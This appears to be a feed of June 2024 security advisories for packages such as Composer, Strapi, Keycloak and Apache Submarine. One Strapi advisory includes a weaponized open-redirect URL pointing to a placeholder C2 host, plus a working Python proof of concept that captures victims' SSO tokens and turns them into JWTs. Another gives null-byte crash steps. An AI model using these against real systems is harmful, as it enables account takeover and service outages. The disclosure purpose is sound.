11.06.2024 01:15:09	alpinelinux	[ALPINE:CVE-2024-35241] composer vulnerability (high)	[From CVE-2024-35241] Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35241
11.06.2024 01:15:09	alpinelinux	[ALPINE:CVE-2024-35242] composer vulnerability (high)	[From CVE-2024-35242] Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35242
11.06.2024 22:56:11	npm	[NPM:GHSA-878H-RQCQ-MV3X] Jan path traversal vulnerability (critical)	An arbitrary file upload vulnerability in the /v1/app/appendFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-878H-RQCQ-MV3X
11.06.2024 22:56:06	npm	[NPM:GHSA-QFJH-MVQ6-C5P8] Jan path traversal vulnerability (critical)	An arbitrary file upload vulnerability in the /v1/app/writeFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QFJH-MVQ6-C5P8
11.06.2024 22:29:49	npm	[NPM:GHSA-5JQC-QJ57-4HRC] Jan path traversal vulnerability (high)	Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5JQC-QJ57-4HRC
13.06.2024 00:36:48	slackware	[SSA:2024-164-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.11.1/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-23/ https://www.cve.org/CVERecord?id=CVE-2024-4367 https://www.cve.org/CVERecord?id=CVE-2024-4767 https://www.cve.org/CVERecord?id=CVE-2024-4768 https://www.cve.org/CVERecord?id=CVE-2024-4769 https://www.cve.org/CVERecord?id=CVE-2024-4770 https://www.cve.org/CVERecord?id=CVE-2024-4777 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.11.1-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.11.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-127.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-127.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:67a3a82d0144edac36b59b5157cd2062 mozilla-thunderbird-115.11.1-i686-1_slack15.0.txzSlackware x86_64 15.0 package:f1cd8a474bd06b6ffc91c8fad66b2a70 mozilla-thunderbird-115.11.1-x86_64-1_slack15.0.txzSlackware -current package:17c61bf1355d0423332550694e950300 xap/mozilla-thunderbird-127.0-i686-1.txzSlackware x86_64 -current package:667f46e200276070eccb35f887072711 xap/mozilla-thunderbird-127.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-164-01
12.06.2024 22:42:24	maven	[MAVEN:GHSA-CQ42-VHV7-XR7P] Keycloak Denial of Service via account lockout (low)	In any realm set with "User (Self) registration" a user that is registered with a username in email format can be "locked out" (denied from logging in) using his username.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CQ42-VHV7-XR7P
12.06.2024 22:41:06	maven	[MAVEN:GHSA-4VC8-PG5C-VG4X] Keycloak's improper input validation allows using email as username (low)	Keycloak allows the use of email as a username and doesn't check that an account with this email already exists. That could lead to the unability to reset/login with email for the user. This is caused by usernames being evaluated before emails.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4VC8-PG5C-VG4X
12.06.2024 22:39:13	npm	[NPM:GHSA-WRVH-RCMR-9QFC] @strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass (high)	### SummaryBy combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).### ImpactUnauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.### Technical details#### Vulnerability 1: Open Redirect##### DescriptionOpen redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.##### RemediationIf possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend <span dir="">http://yourdomainname.com</span> to the URL before issuing the redirect.###### Example 1: Open Redirect in <span dir="">/api/connect/microsoft</span> via `XXXXX["callback"]`- Path: <span dir="">/api/connect/microsoft</span>- Parameter: `XXXXX["callback"]`Payload:```plaintexthttps://google.fr/```Final payload:```plaintexthttps://<TARGET>/api/connect/microsoft?callback=https://google.fr/```User clicks on the link:![c1](https://github.com/strapi/strapi/assets/30262080/c1944cf8-2ef0-4214-ba9e-d4aad10d85ba)Look at the intercepted request in Burp and see the redirect to Microsoft:![c0](https://github.com/strapi/strapi/assets/30262080/0c3d9289-432c-46ac-a7e3-eafe15f02483)Microsoft check the cookies and redirects to the original domain (and route) but with different GET parameters.Then, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):![c2](https://github.com/strapi/strapi/assets/30262080/009e3898-1ccf-4ee4-9c29-496ff6b302d0)The domain originally specified (https://google.fr) as `XXXXX["callback"]` parameter is present in the cookies. So <span dir="">\<TARGET\></span> is using the cookies (`koa.sess`) to redirect.![c3](https://github.com/strapi/strapi/assets/30262080/4c25cb6c-c9e8-4c2d-aa61-1ad1442e5f4d)`koa.sess` cookie:```base64eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==``````json{"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}```The vulnerability seems to come from the application's core:File: [<span dir="">packages/plugins/users-permissions/server/controllers/auth.js</span>](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/controllers/auth.js)```js'use strict';/** * Auth.js controller * * @description: A set of functions called "actions" for managing `Auth`. // eslint-disable no-useless-escape /const crypto = require('crypto');const _ = require('lodash');const { concat, compact, isArray } = require('lodash/fp');const utils = require('@strapi/utils');const { contentTypes: { getNonWritableAttributes },} = require('@strapi/utils');const { getService } = require('../utils');const { validateCallbackBody, validateRegisterBody, validateSendEmailConfirmationBody, validateForgotPasswordBody, validateResetPasswordBody, validateEmailConfirmationBody, validateChangePasswordBody,} = require('./validation/auth');const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;const sanitizeUser = (user, ctx) => { const { auth } = ctx.state; const userSchema = strapi.getModel('plugin::users-permissions.user'); return sanitize.contentAPI.output(user, userSchema, { auth });};module.exports = { async callback(ctx) { const provider = ctx.params.provider \|\| 'local'; const params = ctx.request.body; const store = strapi.store({ type: 'plugin', name: 'users-permissions' }); const grantSettings = await store.get({ key: 'grant' }); const grantProvider = provider === 'local' ? 'email' : provider; if (!_.get(grantSettings, [grantProvider, 'enabled'])) { throw new ApplicationError('This provider is disabled'); } if (provider === 'local') { await validateCallbackBody(params); const { identifier } = params; // Check if the user exists. const user = await strapi.query('plugin::users-permissions.user').findOne({ where: { provider, $or: [{ email: identifier.toLowerCase() }, { username: identifier }], }, }); if (!user) { throw new ValidationError('Invalid identifier or password'); } if (!user.password) { throw new ValidationError('Invalid identifier or password'); } const validPassword = await getService('user').validatePassword( params.password, user.password ); if (!validPassword) { throw new ValidationError('Invalid identifier or password'); } const advancedSettings = await store.get({ key: 'advanced' }); const requiresConfirmation = _.get(advancedSettings, 'email_confirmation'); if (requiresConfirmation && user.confirmed !== true) { throw new ApplicationError('Your account email is not confirmed'); } if (user.blocked === true) { throw new ApplicationError('Your account has been blocked by an administrator'); } return ctx.send({ jwt: getService('jwt').issue({ id: user.id }), user: await sanitizeUser(user, ctx), }); } // Connect the user with the third-party provider. try { const user = await getService('providers').connect(provider, ctx.query); if (user.blocked) { throw new ForbiddenError('Your account has been blocked by an administrator'); } return ctx.send({ jwt: getService('jwt').issue({ id: user.id }), user: await sanitizeUser(user, ctx), }); } catch (error) { throw new ApplicationError(error.message); } }, //... async connect(ctx, next) { const grant = require('grant-koa'); const providers = await strapi .store({ type: 'plugin', name: 'users-permissions', key: 'grant' }) .get(); const apiPrefix = strapi.config.get('api.rest.prefix'); const grantConfig = { defaults: { prefix: `${apiPrefix}/connect`, }, ...providers, }; const [requestPath] = ctx.request.url.split('?'); const provider = requestPath.split('/connect/')[1].split('/')[0]; if (!_.get(grantConfig[provider], 'enabled')) { throw new ApplicationError('This provider is disabled'); } if (!strapi.config.server.url.startsWith('http')) { strapi.log.warn( 'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url' ); } // Ability to pass OAuth callback dynamically grantConfig[provider].callback = _.get(ctx, 'query.callback') \|\| _.get(ctx, 'session.grant.dynamic.callback') \|\| grantConfig[provider].callback; grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider); return grant(grantConfig)(ctx, next); }, //...};```And more specifically:```js... // Ability to pass OAuth callback dynamically grantConfig[provider].callback = _.get(ctx, 'query.callback') \|\| _.get(ctx, 'session.grant.dynamic.callback') \|\| grantConfig[provider].callback; grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider); return grant(grantConfig)(ctx, next);...```Possible patch:```jsgrantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] \|\| grantConfig[provider].callback````_.get(ctx, 'query.callback')` = `XXXXX["callback"]` and `_.get(ctx, 'session')` = `$_COOKIE["koa.sess"]` (which is `{"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}`) so `_.get(ctx, 'session.grant.dynamic.callback')` = `https://XXXXXXX/`.The route is clearly defined here:File: [<span dir="">packages/plugins/users-permissions/server/routes/content-api/auth.js</span>](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/routes/content-api/auth.js)```js'use strict';module.exports = [//... { method: 'GET', path: '/auth/:provider/callback', handler: 'auth.callback', config: { prefix: '', }, }, //...];```File: [<span dir="">packages/plugins/users-permissions/server/services/providers-registry.js</span>](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/services/providers-registry.js)```jsconst getInitialProviders = ({ purest }) => ({//.. async microsoft({ accessToken }) { const microsoft = purest({ provider: 'microsoft' }); return microsoft .get('me') .auth(accessToken) .request() .then(({ body }) => ({ username: body.userPrincipalName, email: body.userPrincipalName, })); },//..});```If parameter `XXXXX["callback"]` is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie `koa.sess`:`koa.sess`=`eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9`Which once base64 decoded become `{"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}`.The signature of the cookie is stored in cookie `koa.sess.sig`:`koa.sess.sig`=`wTRmcVRrn88hWMdg84VvSD87-_0`File: [<span dir="">packages/plugins/users-permissions/server/bootstrap/grant-config.js</span>](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/bootstrap/grant-config.js)```js//.. microsoft: { enabled: false, icon: 'windows', key: '', secret: '', callback: `${baseURL}/microsoft/callback`, scope: ['user.read'], },//..```#### Vulnerability 2: Session token in URL##### DescriptionApplications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.###### Example 1: SSO token transmitted within URL (`XXXXX["access_token"]`)- Path: <span dir="">/api/connect/microsoft</span>- Parameter: `XXXXX["callback"]`When a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.Weaponized payload:```plaintexthttps://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/```With a web server specially developed to exploit the vulnerability listening on <span dir="">\<C2\>:8080</span>, it is possible to retrieve a JWT token allowing authentication on Strapi.A user is on his browser when he decides to click on a link sent to him by e-mail.![c4](https://github.com/strapi/strapi/assets/30262080/c6e22fa1-14a4-4c76-a832-d07305f265b6)> The attacker places the malicious link in the URL bar to simulate a victim's click.![c5](https://github.com/strapi/strapi/assets/30262080/4da28c5b-6501-4f93-9041-9917a2b070e6)The server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user's SSO token.> Everything is invisible to the victim.![c6](https://github.com/strapi/strapi/assets/30262080/58db0a31-3b3b-4648-958b-953eba88bf87)Because the victim didn't change to another Web page.![c7](https://github.com/strapi/strapi/assets/30262080/ab4dd6f9-02e1-42c9-9142-434db865f0d3)The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.![c8](https://github.com/strapi/strapi/assets/30262080/aab8d22f-5f0e-4a67-85a8-2e333df9b84b)##### Details###### Get the JWT token with the `access_token`First of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.Request (HTTP):```httpGET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV<REDACTED>yBzA HTTP/1.1Host: <TARGET>```Response (HTTP):```httpHTTP/1.1 200 OKServer: nginxDate: Mon, 27 Nov 2023 17:58:46 GMTContent-Type: application/json; charset=utf-8Content-Length: 411Connection: keep-aliveContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'Referrer-Policy: no-referrerStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneVary: OriginX-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Powered-By: <REDACTED>{"jwt":"eyJhbG<REDACTED>eCac","user":{"id":111,"username":"<REDACTED>@<REDACTED>-ext.com","email":"<redacted>@<redacted>-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}}```###### Request API routes using the JWT tokenThen reuse the JWT token to request the API.Request (HTTP):```httpGET /api/users/me/groups?app=support HTTP/1.1Host: <TARGET>Authorization: Bearer eyJ<REDACTED>EeCac```Response (HTTP):```httpHTTP/1.1 200 OKServer: nginxDate: Tue, 28 Nov 2023 13:45:42 GMTContent-Type: application/json; charset=utf-8Content-Length: 24684Connection: keep-aliveContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'Referrer-Policy: no-referrerStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneVary: OriginX-RateLimit-Limit: 10X-RateLimit-Remaining: 9X-RateLimit-Reset: 1701179203X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Powered-By: <REDACTED>{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,<REDACTED>...```### POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)```pythonimport base64import jsonimport urllib.parsefrom http.server import BaseHTTPRequestHandler, HTTPServerfrom sys import argv# Strapi URL.TARGET = "target.com"# URLs to which victims are automatically redirected.REDIRECT_URL = [ "strapi.io", "www.google.fr"]# URL used to generate a valid JWT token for authentication within the# application.GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"# This function is used to generate a curl command which once executed, will# give us a valid JWT connection token.def generate_curl_command(token): command = f"curl '{GEN_JWT_URL}?access_token={token}'" return command# We create a custom HTTP server to retrieve users' SSO tokens.class CustomServer(BaseHTTPRequestHandler): # Here we override the default logging function to reduce verbosity. def log_message(self, format, args): pass # This function automatically redirects a user to the page defined in the # global variable linked to the redirection. def _set_response(self): self.send_response(302) self.send_header("Location", REDIRECT_URL[0]) self.end_headers() # If an SSO token is present, we parse it and log the result in STDOUT. def do_GET(self): # This condition checks whether a token is present in the URL. if str(self.path).find("access_token") != -1: # If this is the case, we recover the token. query = urllib.parse.urlparse(self.path).query query_components = dict(qc.split("=") for qc in query.split("&")) access_token = urllib.parse.unquote(query_components["access_token"]) # In the token, which is a string in JWT format, we retrieve the # body part of the token. interesting_data = access_token.split(".")[1] # Patching base64 encoded data. interesting_data = interesting_data + "=" * (-len(interesting_data) % 4) # Parsing JSON. json_data = json.loads(base64.b64decode(interesting_data.encode())) family_name, given_name, ipaddr, upn = json_data["given_name"], json_data["family_name"], json_data["ipaddr"], json_data["upn"] print(f"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\n{access_token}\n") print(f"[*] Run: \"{generate_curl_command(query_components['access_token'])}\" to get JWT token") self._set_response() self.wfile.write("Redirecting ...".encode("utf-8"))def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080): server_address = (ip, port) httpd = server_class(server_address, handler_class) print(f"Starting httpd ({ip}:{port}) ...") try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print("Stopping httpd ...")if __name__ == "__main__": if len(argv) == 3: run(ip=argv[1], port=int(argv[2])) else: run()```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WRVH-RCMR-9QFC
12.06.2024 22:38:25	npm	[NPM:GHSA-PM9Q-XJ9P-96PM] @strapi/plugin-upload has a Denial-of-Service via Improper Exception Handling (moderate)	### SummaryA Denial-of-Service was found in the media upload process causing the server to crash without restarting, affecting either development and production environments.### DetailsUsually, errors in the application cause it to log the error and keep it running for other clients. This behavior, in contrast, stops the server execution, making it unavailable for any clients until it's manually restarted. ### PoCDue to a bug in what we believe to be Burp’s decoding system, we couldn’t produce a valid file to easily reproduce the vulnerability. Instead, the issue can be reproduced by following these steps:1. Configure Burp’s proxy between a browser and a Strapi server2. Log in and upload an image through the Media Library page while having Burp’s interceptor turned on3. After capturing the upload POST request in Burp, add `%00` at the end of the file extension from the `Content-Disposition`, in the filename parameter (See reference image 1 below)4. Using the cursor, select the added `%00` and right-click it. Click in Convert selection > URL > URL decode to transform the selected text into a null byte5. Forward the modified request. The server should print an error and crash with the error `ERR_INVALID_ARG_VALUE` (See reference log 1 below)By following the data flow, we reached the [line of code](https://github.com/strapi/strapi/blob/f1dd5cc8eef574bac6679aab6f93276e57497328/packages/providers/upload-local/src/index.ts#L86) where we believe the DoS is being caused.The simpler way of fixing this vulnerability seems to be avoiding the error thrown by whitelisting the characters used in the extension.#### Reference Image 1![image](https://github.com/strapi/strapi/assets/8593673/c95278a1-1727-485e-b6f8-276074d9dd42)#### Reference Log 1```[2024-03-22 10:23:42.629] http: POST /upload (22 ms) 400node:internal/fs/utils:379 const err = new ERR_INVALID_ARG_VALUE( ^TypeError [ERR_INVALID_ARG_VALUE]: The argument 'path' must be a string, Uint8Array, or URL without null bytes. Received '/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/public/uploads/replaceme_png_88efe6a165.png\x00' at new WriteStream (node:internal/fs/streams:340:5) at Object.createWriteStream (node:fs:3123:10) at /mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:71:33 at new Promise (<anonymous>) at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:68:16) at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/register.js:80:35) at Object.upload (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/provider.js:16:46) at Object.uploadImage (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/upload.js:220:48) { code: 'ERR_INVALID_ARG_VALUE'}```### ImpactDenial-of-Service occurs when a service becomes unavailable for users or other services.By sending a specially-crafted request, the server crashes without restarting. The entire server crashes with the thrown error instead of crashing only the single request and returning error 500 to the user.Any user with access to the file upload functionality is able to exploit this vulnerability, affecting applications running in both development mode and production mode as well.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PM9Q-XJ9P-96PM
12.06.2024 22:38:03	npm	[NPM:GHSA-6J89-FRXC-Q26M] @strapi/plugin-content-manager leaks data via relations via the Admin Panel (low)	### Summary1. If a super admin creates a collection where an item in the collection has an association to another collection, a user with the Author Role can see the list of associated items they did not create. They should only see their own items that they created, not all items ever created.### DetailsAt the top level every collection shows blank items for an Author if they did not create the item. This is ideal and works great. However if you associate one private collection to another private collection and an Author creates a new item. The pull down should not show the admins list of previously created items. It should be blank unitl they add their own items.### PoC1. Sign in as Admin. Navigate to content creation.2. Select a collection and verify you have items you created there. And that they have associations to other protected collections.3. Verify role permissions for your collections are set to CRUD if user created.4. Log out and sign in as a unrelated Author.5. Navigate to content management and verify you see collections built by admin but empty for you (as expected)6. Create a new item as an Author and see the card appear with attributes to fill out.7. Use the form pull down for the associations.8. Notice that protected collection items from Admin appear in drop down. These should be hidden### ImpactSecurity vulnerability where authors have access to protected data created by admin. This could be passwords emails or any other item created for the admin's collection. See images below for more contextPermissions set![image](https://user-images.githubusercontent.com/364910/265132222-66e85726-5e01-4ad3-901a-809270a7f11b.png)Good at top level no items seen![image](https://user-images.githubusercontent.com/364910/265132292-d63fa6df-f32d-48a3-80d0-48a651c570a8.png)Drop down in Author login can see Admin data![image](https://user-images.githubusercontent.com/364910/265132393-8105bae2-b45c-4327-b1c6-da093557e64f.png)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6J89-FRXC-Q26M
12.06.2024 22:45:07	npm	[NPM:GHSA-CC55-MVQC-G9MG] SummerNote Cross Site Scripting Vulnerability (moderate)	SummerNote 0.8.18 is vulnerable to Cross Site Scripting (XSS) via the Code View Function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CC55-MVQC-G9MG
12.06.2024 21:10:04	ubuntu	[USN-6819-3] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-3
12.06.2024 18:51:37	ubuntu	[USN-6831-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6831-1
12.06.2024 22:45:12	maven	[MAVEN:GHSA-6Q97-8V3G-RPXW] Apache Submarine Server Core Incorrect Authorization vulnerability (critical)	Incorrect Authorization vulnerability in Apache Submarine Server Core.This issue affects Apache Submarine Server Core: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6Q97-8V3G-RPXW
12.06.2024 22:44:50	maven	[MAVEN:GHSA-V74C-QC46-9GG9] Apache Submarine Server Core has a SQL Injection Vulnerability (high)	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Submarine Server Core.This issue affects Apache Submarine Server Core: all versions.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V74C-QC46-9GG9
12.06.2024 22:44:27	maven	[MAVEN:GHSA-JWCG-WV5X-VG3G] Apache Submarine Commons Utils has a hard-coded secret (moderate)	Improper Authentication vulnerability in Apache Submarine Commons Utils.This issue affects Apache Submarine Commons Utils: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JWCG-WV5X-VG3G
12.06.2024 22:44:10	maven	[MAVEN:GHSA-4C7Q-M7HC-PC92] Elasticsearch Remote Cluster Search Cross Cluster API Key insufficient restrictions (moderate)	It was identified that if a cross-cluster API key https://www.elastic.co/guide/en/elasticsearch/reference/8.14/security-api-create-cross-cluster-api-key.html#security-api-create-cross-cluster-api-key-request-body restricts search for a given index using the query or the field_security parameter, and the same cross-cluster API key also grants replication for the same index, the search restrictions are not enforced during cross cluster search operations and search results may include documents and terms that should not be returned.This issue only affects the API key based security model for remote clusters https://www.elastic.co/guide/en/elasticsearch/reference/8.14/remote-clusters.html#remote-clusters-security-models that was previously a beta feature and is released as GA with 8.14.0	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4C7Q-M7HC-PC92
12.06.2024 15:50:24	ubuntu	[USN-6829-1] MATIO vulnerability (medium)	MATIO could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6829-1
12.06.2024 14:59:10	ubuntu	[USN-6830-1] libndp vulnerability (high)	libndp could be made to crash or run programs if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6830-1
12.06.2024 03:00:00	cisa	[CISA-2024:0612] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0612
12.06.2024 03:00:00	debian	[DSA-5709-1] firefox-esr	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5709-1
12.06.2024 03:00:00	oraclelinux	[ELSA-2024-3823] rpm-ostree security update (moderate)	[2024.3-3]- Backport https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6 Resolves: #RHEL-31852[2024.3-2]- Backport https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6 Resolves: #RHEL-31852	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3823
12.06.2024 03:00:00	oraclelinux	[ELSA-2024-3837] 389-ds-base security update (important)	[2.4.5-8]- Bump version to 2.4.5-8- Fix License tag[2.4.5-7]- Bump version to 2.4.5-7- Resolves: RHEL-34819 - redhat-ds:11/389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c- Resolves: RHEL-34825 - redhat-ds:11/389-ds-base: potential denial of service via specially crafted kerberos AS-REQ requ	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3837
